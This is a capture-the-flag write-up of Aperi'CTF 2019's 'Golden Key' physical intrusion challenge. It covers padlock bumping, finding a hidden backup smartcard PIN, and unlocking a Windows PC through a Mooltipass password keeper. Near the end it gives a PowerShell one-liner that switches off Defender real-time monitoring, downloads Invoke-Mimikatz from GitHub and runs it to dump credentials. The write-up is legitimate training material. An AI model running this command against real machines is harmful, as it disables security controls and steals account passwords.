Aperi’CTF 2019 - Golden Key
|Aperi’CTF 2019||Golden Key||Physical||350||3|
You are mandated to perform a physical intrusion test within Reynholm Industries.
During your mission, you found a locked PC with an offline password keeper Mooltipass Mini attached.
Investigate and retrieve the PC Administrator account!
Notes: * No guessing! * This is a two-part realistic challenge; * Force usage is not necessary and prohibited on this challenge; * Please do not disassemble the equipment!
Looking at the desktop, we’ve got :
- A locked computer with a password prompt for Baptiste user
- A Mooltipass Mini smartcard with “Baptiste - ACTIVE” name
- A Mooltipass Mini that has been unplugged from the computer
- A locked chest
Looking at the official documentation, all we need is to insert the smartcard into the Mooltipass Mini and attach the device to the computer using the micro-USB power cord.
Let’s try it!
The card seems to be blocked… According to the documentation “entering a wrong PIN three times in a row will permanently block your card”.
Let’s look at the locked chest!
The chest is closed and locked using a Master Lock padlock.
The operation of the lock can be achieved by a simple bumping action to the keyhead to both open and close the lock without the need of tight grasping, pinching, or twisting of the wrist.
To pick this lock, even if it seems counterintuitive, we don’t need a tension wrench!
After picking the lock, we finally retrieve a Mooltipass Mini box:
Removing all parts from the box, we get a “Backup” smartcard and a sticky note on which it is written “NO GUESSING!”.
If we search for an hidden enclosure, we finally find a PIN code under the protective foam:
Let’s grab the backup card and use this PIN code to get the first flag!
The first flag is
baptiste - windows password entry, we can unlock the computer.
Even if Baptiste is member of the
Administrators group, we’re asked to get the
Administrator account password. Let’s use Mimikatz!
Set-MpPreference -DisableRealtimeMonitoring $true IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/4c7a2016fc7931cd37273c5d8e17b16d959867b3/Exfiltration/Invoke-Mimikatz.ps1'); $m = Invoke-Mimikatz -DumpCreds; $m Set-MpPreference -DisableRealtimeMonitoring $false
The final flag is